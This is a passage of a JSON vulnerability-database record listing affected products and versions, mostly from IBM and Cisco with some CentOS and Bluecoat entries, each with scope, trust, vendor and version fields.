"model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.7" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "rational application developer for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "rational application developer for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "openssh for gpfs", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.8.3.0" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "bigfix remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "api connect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex node for mcs", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings server ssl gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "webex meetings server multimedia platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "webex meetings for windows phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80" }, { "model": "webex meetings for blackberry", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings client on-premises", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "webex meetings client hosted", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "webex meeting center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex business suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtual security gateway for microsoft hyper-v", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtual security gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "videoscape control suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "videoscape anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "video surveillance 4300e and 4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "video distribution suite for internet streaming", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell iuh", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.99.4" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.2.0" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50003.4.2.0" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "unity express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified workforce optimization quality management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "unified workforce optimization", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified wireless ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified sip proxy software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified sip proxy", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "unified ip conference phone for third-party call control", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "unified ip series phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69450" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69010" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified intelligence center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified contact center enterprise live data server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager im \u0026 presence service (formerly c", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console standard", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs standalone c-series rack server integrated management cont", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "ucs manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs central software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs b-series blade servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs series and series fabric interconnects", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "620063000" }, { "model": "uc integration for microsoft lync", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence tx9000 series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system tx1310", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "telepresence system tx9000", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-37" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-32" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1100" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8200" }, { "model": "telepresence server on multiparty media and", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3103200" }, { "model": "telepresence server and mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "701087100" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence isdn gateway mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "telepresence isdn gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tapi service provider", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "tandberg codian isdn gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "stealthwatch management console", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "stealthwatch identity", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "stealthwatch flowcollector sflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "stealthwatch flowcollector netflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa525g 5-line ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa51x ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa232d multi-line dect analog telephone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa122 analog telephone adapter with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart net total care local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "smart care", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "small business spa500 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "small business spa300 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "small business series managed switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "small business series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "services provisioning platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "secure access control system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "registered envelope service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime performance manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime optical for service providers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime optical", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime ip express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime infrastructure plug and play standalone gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime access registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "physical access gateways", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "partner support service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "packaged contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ons series multiservice provisioning platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "154540" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "onepk all-in-one virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "one portal", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches standalone nx-os mode", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "nexus series fabric switches aci mode", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "nexus series blade switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "nexus intercloud for vmware", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "nexus intercloud", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "network performance analysis", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "netflow generation appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nac appliance clean access server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "nac appliance clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "mxe series media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "35000" }, { "model": "multicast manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mobility services engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "media services interface", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mds series multilayer switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for iphone and ipad", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber client framework components", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ironport email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ip series phones vpn feature", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800-0" }, { "model": "ip series phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "78000" }, { "model": "ios xr software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "intrusion prevention system solutions", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "intracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "intelligent automation for cloud", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "identity services engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise content delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "emergency responder", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "content security appliance update servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "connected grid routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "connected analytics for collaboration", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "configuration professional", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "computer telephony integration object server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "common services platform collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloupia unified infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud object storage", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "broadband access center telco and wireless", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog terminal adaptors", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "asr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "asa next-generation firewall services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application networking manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application and content networking system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for mac os", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "x0" }, { "model": "anyconnect secure mobility client for linux", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aironet series access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "27000" }, { "model": "agent for openflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "agent desktop", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ace30 application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ace application control engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "47100" }, { "model": "industrial router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9100" }, { "model": "series stackable managed switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "series stackable", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "series digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "44000" }, { "model": "series digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "series smart plus switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2200" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "7" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.7" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "11.0" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "10.0" }, { "model": "ssl visibility", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.9" }, { "model": "ssl visibility 3.8.4fc", "scope": null, "trust": 0.3, "vendor": "bluecoat", "version": null }, { "model": "policycenter s-series", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.1" }, { "model": "policycenter", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.2" }, { "model": "packetshaper s-series", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "11.6" }, { "model": "packetshaper s-series", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", 